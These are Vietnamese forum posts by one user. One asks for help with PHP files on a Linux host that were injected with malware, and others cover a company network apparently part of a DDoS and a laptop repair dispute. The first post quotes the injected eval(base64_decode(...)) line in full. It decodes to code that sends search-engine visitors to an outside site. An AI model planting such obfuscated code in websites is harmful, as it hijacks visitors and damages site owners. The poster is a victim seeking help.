Messages posted by: thuycuong

Chào anh chị !
Như phần mềm kaspersky internet của em thông báo thì đây là virut có tên Heur:Trojan.Scrip.Generic

Khi em mở 1 file dạng .php thì kasperky báo như vậy. Trên host nếu có file .php(dùng hệ điều hành linux) thì đều bị chèn 1 đoạn code được mã hóa:

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpIGFuZCAhc3RyaXN0cigkdWFnLCJNU0lFIDYuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20vbCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFvbC5jb20iKSkgew0KaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIG9yICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpKXsNCmhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9vcGVjLmxmbGluay5jb20vIik7DQpleGl0KCk7DQp9Cn0KfQ0KfQ0KfQ=="));

Khi truy cập trực tiếp website bằng cách gõ tên domain trên thanh địa chỉ thì không bị chuyển sang một trang web lạ, nhưng khi vào website bằng cách gõ 1 từ khóa mà website đó được index lên google thì bị chuyển sang web lạ.
Em không biết về bảo mật nên không hiểu nguy hiểm của nó, chỉ biết nguy hiểm cho người làm SEO nếu website lên top mà bị như vậy thì dễ bị tụt thứ hạng.

Cảm ơn anh chị nhiều.

TQN wrote:

Xem ở topic phân tích DDOS vào HVA, sẽ thấy thằng virus nằm vùng nào trên máy bạn, công ty bạn đang DDOS danlambaovn.blogspot.com.

dạ em cảm ơn để em coi thử smilie

các bạn như trường hợp mình thì xem tại topic này hen :

/hvaonline/posts/list/39641.html

Hello !

Mấy bữa nay em vào máy tính ở công ty thì vào mấy site blogpost đều không vào được và thấy có thông báo :

Hệ thống của chúng tôi đã phát hiện thấy lưu lượng truy cập bất thường từ mạng máy tính của bạn. Vui lòng thử lại yêu cầu của bạn sau. Tại sao việc này lại xảy ra?

Địa chỉ IP: xxxxxxxx.178
Thời gian: 2011-08-10T09:20:09Z
danlambaovn.blogspot.com

Em có gửi cho bạn bè và bạn bè cũng không vào được, có anh chị nào cũng bị như em không ạ !
Và nguyên nhân của nó là gì nhỉ smilie

Xin chào cả nhà !

Em đang đùng máy tính HP6535s, tối hôm trước em vẫn xem bình thường, sáng hôm hôm sau đi học về bật thì bị mờ màn hình smilie

, em có mang đi sửa ở công ty Hai Yến ở Tp Vũng Tàu (haiyen.com.vn) thì bảo em là bị hỏng áp màn hình hay cái gì đó em cũng không biết nữa : họ không kiểm tra và báo giá là 600k. em đồng ý để máy ở đó(khi em mang đến máy tính mờ màn hình có thể xuất ra màn hình máy bàn được trong phiếu sửa chữa có ghi là " mờ màn hình + còn tem ) , hẹn em 2 ngày và 2 ngày em ra lấy thì bảo là sửa được màn hình rồi nhưng máy tính không lên nữa, đến hôm nay là lần thứ 5 của 2 ngày sau (hơn 10 lần em gọi điện tới công ty HY). cứ hẹn em rồi bảo 2 ngày sau mà ko thấy đâu smilie

, họ bảo là nếu ko sửa được thì sẽ đóng lại trả cho em, mà bây giờ máy hư luôn ko xuất được ra màn hình, nghe anh kỹ thuật ở đó nói là hỏng main :-ss

vậy bây giờ em phải làm sao ạ " lơn lành thành lợn què " .

trường hợp này là lỗi do máy của em hay do bên công ty họ ạ